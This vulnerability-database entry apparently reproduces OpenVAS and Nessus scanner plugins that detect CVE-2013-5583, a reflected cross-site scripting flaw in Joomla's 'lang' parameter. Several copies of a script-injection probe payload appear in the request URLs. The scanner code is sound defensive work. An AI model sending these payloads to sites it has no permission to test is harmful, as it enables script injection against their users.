Joomla! 'lang' Parameter Reflected Cross Site Scripting Vulnerability
2014-01-06T00:00:00
ID OPENVAS:1361412562310804057 Type openvas Reporter Copyright (C) 2014 Greenbone Networks GmbH Modified 2020-05-08T00:00:00
Description
Joomla is installed on this host and is prone to a reflected cross-site scripting
vulnerability.
###############################################################################
# OpenVAS Vulnerability Test
# $Id: gb_joomla_lang_parm_xss_vuln.nasl 34118 2014-01-06 12:53:52Z Jan$
#
# Joomla! 'lang' Parameter Reflected Cross Site Scripting Vulnerability
#
# Authors:
# Thanga Prakash S <tprakash@secpod.com>
#
# Copyright:
# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2
# (or any later version), as published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
###############################################################################
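# CPE identifier used below to look up the port and install path of the
# Joomla! instance that joomla_detect.nasl registered.
CPE = "cpe:/a:joomla:joomla";

# Metadata pass: when the scanner loads the plugin with `description` set, only
# the registration calls in this block run and the script exits before any
# network traffic is generated.
if(description)
{
  # Identification and scoring.
  script_oid("1.3.6.1.4.1.25623.1.0.804057");
  script_version("2020-05-08T08:34:44+0000");
  script_cve_id("CVE-2013-5583");
  script_bugtraq_id(61600);
  script_tag(name:"cvss_base", value:"4.3");
  script_tag(name:"cvss_base_vector", value:"AV:N/AC:M/Au:N/C:N/I:P/A:N");
  script_tag(name:"last_modification", value:"2020-05-08 08:34:44 +0000 (Fri, 08 May 2020)");
  script_tag(name:"creation_date", value:"2014-01-06 12:53:52 +0530 (Mon, 06 Jan 2014)");

  script_name("Joomla! 'lang' Parameter Reflected Cross Site Scripting Vulnerability");

  script_tag(name:"summary", value:"This host is installed with Joomla and is prone to cross site scripting
vulnerability.");

  # The check below only looks for the probe markup being echoed back unencoded
  # in the HTTP response; it never reads a cookie, so the text says exactly that.
  script_tag(name:"vuldetect", value:"Sends a crafted HTTP GET request and checks whether the injected script
markup is returned unencoded in the response.");

  # NOTE(review): the check is not version based - it probes the example page
  # directly - so the fixed version quoted here cannot be confirmed from this
  # script. Verify it against the vendor advisory before relying on it.
  script_tag(name:"solution", value:"Upgrade to Joomla version 3.1.6 or later.");

  script_tag(name:"insight", value:"Input passed via the 'lang' parameter to
'/libraries/idna_convert/example.php' script is not properly sanitized before being returned to the user.");

  script_tag(name:"affected", value:"Joomla version 3.1.5 and prior.");

  script_tag(name:"impact", value:"Successful exploitation will allow attacker to execute arbitrary HTML and
script code in a user's browser session in the context of an affected site.");

  # External references for the finding.
  script_xref(name:"URL", value:"http://secunia.com/advisories/54353");
  script_xref(name:"URL", value:"http://seclists.org/bugtraq/2013/Aug/27");
  script_xref(name:"URL", value:"https://github.com/joomla/joomla-cms/issues/1658");
  script_xref(name:"URL", value:"http://disse.cting.org/2013/08/05/joomla-core-3_1_5_reflected-xss-vulnerability");

  # ACT_ATTACK: the plugin sends a crafted request to the target rather than
  # inferring the result from a banner or version string.
  script_category(ACT_ATTACK);
  script_tag(name:"qod_type", value:"remote_analysis");
  script_copyright("Copyright (C) 2014 Greenbone Networks GmbH");
  script_family("Web application abuses");

  # Run only after Joomla! detection has stored its "joomla/installed" key.
  script_dependencies("joomla_detect.nasl");
  script_mandatory_keys("joomla/installed");
  script_require_ports("Services/www", 80);

  script_tag(name:"solution_type", value:"VendorFix");

  exit(0);
}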
include("http_func.inc");
include("host_details.inc");
include("http_keepalive.inc");
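# Resolve the HTTP port of the detected Joomla! instance; nothing to test
# when detection did not record one.
if (!jPort = get_app_port(cpe:CPE))
  exit(0);

# Resolve the install path on that port.
if (!dir = get_app_location(cpe:CPE, port:jPort))
  exit(0);

# A root install is reported as "/"; drop it so the URL built below does not
# start with a double slash.
if (dir == "/")
  dir = "";

# Request against the bundled idna_convert example page with probe markup in
# the 'lang' parameter.
url = dir + '/libraries/idna_convert/example.php?lang=";><script>alert(document.cookie);</script><!--';

# The pattern is a regular expression, so the dot in "document.cookie" is
# escaped along with the parentheses; unescaped it would match any character.
# extra_check additionally requires the ">phlyLabs" string in the response,
# which ties the match to the example page itself.
# NOTE(review): check_header:TRUE presumably restricts matches to successful
# (200) responses - confirm in http_keepalive.inc.
# A hit shows the input is reflected unencoded in the response body; it does
# not show script execution in a browser.
if (http_vuln_check(port:jPort, url:url, check_header:TRUE, pattern:"><script>alert\(document\.cookie\);</script>",
                    extra_check:">phlyLabs")) {
  report = http_report_vuln_url( port:jPort, url:url );
  security_message(port:jPort, data:report);
  exit(0);
}

# No reflection observed: exit with 99, which appears to be the plugin
# convention for "tested, not affected" - confirm against scanner docs.
exit(99);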
{"id": "OPENVAS:1361412562310804057", "type": "openvas", "bulletinFamily": "scanner", "title": "Joomla! 'lang' Parameter Reflected Cross Site Scripting Vulnerability", "description": "This host is installed with Joomla and is prone to cross site scripting\nvulnerability.", "published": "2014-01-06T00:00:00", "modified": "2020-05-08T00:00:00", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310804057", "reporter": "Copyright (C) 2014 Greenbone Networks GmbH", "references": ["http://seclists.org/bugtraq/2013/Aug/27", "http://secunia.com/advisories/54353", "http://disse.cting.org/2013/08/05/joomla-core-3_1_5_reflected-xss-vulnerability", "https://github.com/joomla/joomla-cms/issues/1658"], "cvelist": ["CVE-2013-5583"], "lastseen": "2020-05-12T17:26:21", "viewCount": 1, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2013-5583"]}, {"type": "nessus", "idList": ["JOOMLA_EXAMPLE_LANG_XSS.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310803850"]}], "modified": "2020-05-12T17:26:21", "rev": 2}, "score": {"value": 4.9, "vector": "NONE", "modified": "2020-05-12T17:26:21", "rev": 2}, "vulnersScore": 4.9}, "pluginID": "1361412562310804057", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_joomla_lang_parm_xss_vuln.nasl 34118 2014-01-06 12:53:52Z Jan$\n#\n# Joomla! 
'lang' Parameter Reflected Cross Site Scripting Vulnerability\n#\n# Authors:\n# Thanga Prakash S <tprakash@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:joomla:joomla\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.804057\");\n script_version(\"2020-05-08T08:34:44+0000\");\n script_cve_id(\"CVE-2013-5583\");\n script_bugtraq_id(61600);\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_tag(name:\"last_modification\", value:\"2020-05-08 08:34:44 +0000 (Fri, 08 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2014-01-06 12:53:52 +0530 (Mon, 06 Jan 2014)\");\n\n script_name(\"Joomla! 
'lang' Parameter Reflected Cross Site Scripting Vulnerability\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Joomla and is prone to cross site scripting\nvulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Send a crafted data via HTTP GET request and check whether it is able to\nread cookie or not.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Joomla version 3.1.6 or later.\");\n\n script_tag(name:\"insight\", value:\"Input passed via the 'lang' parameter to\n'/libraries/idna_convert/example.php' script is not properly sanitized before being returned to the user.\");\n\n script_tag(name:\"affected\", value:\"Joomla version 3.1.5 and prior.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attacker to execute arbitrary HTML and\nscript code in a user's browser session in the context of an affected site.\");\n\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/54353\");\n script_xref(name:\"URL\", value:\"http://seclists.org/bugtraq/2013/Aug/27\");\n script_xref(name:\"URL\", value:\"https://github.com/joomla/joomla-cms/issues/1658\");\n script_xref(name:\"URL\", value:\"http://disse.cting.org/2013/08/05/joomla-core-3_1_5_reflected-xss-vulnerability\");\n\n script_category(ACT_ATTACK);\n script_tag(name:\"qod_type\", value:\"remote_analysis\");\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"joomla_detect.nasl\");\n script_mandatory_keys(\"joomla/installed\");\n script_require_ports(\"Services/www\", 80);\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"host_details.inc\");\ninclude(\"http_keepalive.inc\");\n\nif (!jPort = get_app_port(cpe:CPE))\n exit(0);\n\nif (!dir = get_app_location(cpe:CPE, port:jPort))\n exit(0);\n\nif (dir == \"/\")\n dir = \"\";\n\nurl = dir + 
'/libraries/idna_convert/example.php?lang=\";><script>alert(document.cookie);</script><!--';\n\nif (http_vuln_check(port:jPort, url:url, check_header:TRUE, pattern:\"><script>alert\\(document.cookie\\);</script>\",\n extra_check:\">phlyLabs\")) {\n report = http_report_vuln_url( port:jPort, url:url );\n security_message(port:jPort, data:report);\n exit(0);\n}\n\nexit(99);\n", "naslFamily": "Web application abuses"}
{"cve": [{"lastseen": "2021-02-02T06:06:58", "description": "Cross-site scripting (XSS) vulnerability in libraries/idna_convert/example.php in Joomla! 3.1.5 allows remote attackers to inject arbitrary web script or HTML via the lang parameter.", "edition": 4, "cvss3": {}, "published": "2013-12-29T04:25:00", "title": "CVE-2013-5583", "type": "cve", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-5583"], "modified": "2016-12-31T02:59:00", "cpe": ["cpe:/a:joomla:joomla\\!:3.1.5"], "id": "CVE-2013-5583", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5583", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:joomla:joomla\\!:3.1.5:*:*:*:*:*:*:*"]}], "openvas": [{"lastseen": "2020-05-12T17:27:21", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-5583"], "description": "This host is running Joomla and is prone to xss vulnerability.", "modified": "2020-05-08T00:00:00", "published": "2013-08-06T00:00:00", "id": "OPENVAS:1361412562310803850", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310803850", "type": "openvas", "title": "Joomla 'lang' Parameter Cross Site Scripting Vulnerability-August13", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Joomla 'lang' Parameter Cross Site Scripting Vulnerability-August13\n#\n# Authors:\n# Thanga Prakash S <tprakash@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2013 Greenbone Networks GmbH, 
http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:joomla:joomla\";\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.803850\");\n script_version(\"2020-05-08T08:34:44+0000\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_tag(name:\"last_modification\", value:\"2020-05-08 08:34:44 +0000 (Fri, 08 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2013-08-06 12:51:57 +0530 (Tue, 06 Aug 2013)\");\n\n script_name(\"Joomla 'lang' Parameter Cross Site Scripting Vulnerability-August13\");\n\n script_cve_id(\"CVE-2013-5583\");\n\n script_tag(name:\"summary\", value:\"This host is running Joomla and is prone to xss vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Send a crafted data via HTTP GET request and check whether it is able to\nread cookie or not.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to version 3.2.0 or later.\");\n\n script_tag(name:\"insight\", value:\"Input passed via 'lang' parameter to 'libraries/idna_convert/example.php'\nis not properly sanitised before being returned to the user.\");\n\n script_tag(name:\"affected\", value:\"Joomla versions 3.1.5 and prior\");\n\n 
script_tag(name:\"impact\", value:\"Successful exploitation will allow remote attacker to execute arbitrary HTML\nor script code or discloses sensitive information resulting in loss of confidentiality.\");\n\n script_xref(name:\"URL\", value:\"http://cxsecurity.com/issue/WLB-2013080045\");\n script_xref(name:\"URL\", value:\"http://www.securityfocus.com/archive/1/527765\");\n script_xref(name:\"URL\", value:\"http://exploitsdownload.com/exploit/na/joomla-315-cross-site-scripting\");\n\n script_category(ACT_ATTACK);\n script_tag(name:\"qod_type\", value:\"remote_analysis\");\n script_copyright(\"Copyright (C) 2013 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"joomla_detect.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_mandatory_keys(\"joomla/installed\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"http://www.joomla.org/download.html\");\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"host_details.inc\");\ninclude(\"http_keepalive.inc\");\n\nif(!port = get_app_port(cpe:CPE))\n exit(0);\n\nif(!dir = get_app_location(cpe:CPE, port:port))\n exit(0);\n\nif (dir == \"/\")\n dir = \"\";\n\nurl = dir + '/libraries/idna_convert/example.php?lang=\"><script>alert(document.cookie);</script><!--';\n\nif(http_vuln_check(port:port, url:url, check_header:TRUE, pattern:\"<script>alert\\(document\\.cookie\\);</script>\",\n extra_check:\">phlyLabs\")) {\n report = http_report_vuln_url( port:port, url:url );\n security_message(port:port, data:report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "nessus": [{"lastseen": "2021-01-20T11:36:23", "description": "The version of Joomla! 
running on the remote host is affected by a\ncross-site scripting (XSS) vulnerability in idna_convert/example.php\ndue to improper sanitization of user-supplied input to the 'lang'\nparameter before using it to generate dynamic HTML content. An\nunauthenticated, remote attacker can exploit this to inject arbitrary\nHTML and script code into the user's browser session.", "edition": 29, "cvss3": {"score": 4.7, "vector": "AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:L/A:N"}, "published": "2013-08-09T00:00:00", "title": "Joomla! 'lang' Parameter XSS", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-5583"], "modified": "2013-08-09T00:00:00", "cpe": ["cpe:/a:joomla:joomla\\!"], "id": "JOOMLA_EXAMPLE_LANG_XSS.NASL", "href": "https://www.tenable.com/plugins/nessus/69280", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(69280);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2013-5583\");\n script_bugtraq_id(61600);\n\n script_name(english:\"Joomla! 'lang' Parameter XSS\");\n script_summary(english:\"Attempts to inject script code via the lang parameter.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains a PHP application that is affected by a\ncross-site scripting vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Joomla! running on the remote host is affected by a\ncross-site scripting (XSS) vulnerability in idna_convert/example.php\ndue to improper sanitization of user-supplied input to the 'lang'\nparameter before using it to generate dynamic HTML content. 
An\nunauthenticated, remote attacker can exploit this to inject arbitrary\nHTML and script code into the user's browser session.\");\n # https://web.archive.org/web/20160402054936/http://disse.cting.org/2013/08/05/joomla-core-3_1_5_reflected-xss-vulnerability/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?ceaad26b\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/joomla/joomla-cms/issues/1658\");\n script_set_attribute(attribute:\"solution\", value:\n\"Unknown at this time. It is suggested that the script be removed.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:L/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_cwe_id(20, 74, 79, 442, 629, 711, 712, 722, 725, 750, 751, 800, 801, 809, 811, 864, 900, 928, 931, 990);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/08/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/08/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:joomla:joomla\\!\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses : XSS\");\n\n script_copyright(english:\"This script is Copyright (C) 2013-2021 Tenable Network Security, Inc.\");\n\n script_dependencies(\"joomla_detect.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_require_keys(\"installed_sw/Joomla!\", \"www/PHP\");\n\n 
exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"install_func.inc\");\n\napp = \"Joomla!\";\nget_install_count(app_name:app, exit_if_zero:TRUE);\n\nport = get_http_port(default:80, php:TRUE);\n\ninstall = get_single_install(\n app_name : app,\n port : port\n);\n\ndir = install['path'];\nxss_test = '\";><script>alert(' + \"'\" + SCRIPT_NAME + '-' + unixtime() + \"'\" + ');</script>';\n\nexploit = test_cgi_xss(\n port : port,\n dirs : make_list(dir),\n cgi : '/libraries/idna_convert/example.php',\n qs : 'lang=' + xss_test,\n pass_str : 'name=\"lang\" value=\"' + xss_test,\n pass_re : 'name=\"idn_version\"'\n);\n\nif (!exploit)\n{\n install_url = build_url(qs: dir, port: port);\n audit(AUDIT_WEB_APP_NOT_AFFECTED, app, install_url);\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}]}